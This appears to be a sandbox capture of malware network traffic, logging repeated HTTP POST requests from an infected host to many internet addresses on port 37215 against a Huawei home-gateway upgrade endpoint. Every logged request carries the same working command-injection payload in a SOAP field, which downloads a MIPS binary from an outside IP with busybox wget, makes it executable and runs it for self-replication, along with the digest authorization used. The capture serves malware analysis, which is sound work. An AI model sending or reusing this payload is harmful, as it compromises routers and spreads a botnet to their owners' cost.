                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2292192.168.2.2345082142.135.245.18837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578931093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2293192.168.2.235866241.252.135.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578989983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2294192.168.2.235467841.144.209.4037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579003096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2295192.168.2.234606241.49.37.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579003096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2296192.168.2.235571042.3.34.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579009056 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2297192.168.2.234116053.81.34.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579014063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2298192.168.2.2340276197.51.77.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579121113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2299192.168.2.2337362157.88.82.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579210997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2300192.168.2.2342208197.80.79.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579329967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2301192.168.2.2350382157.64.245.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579593897 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
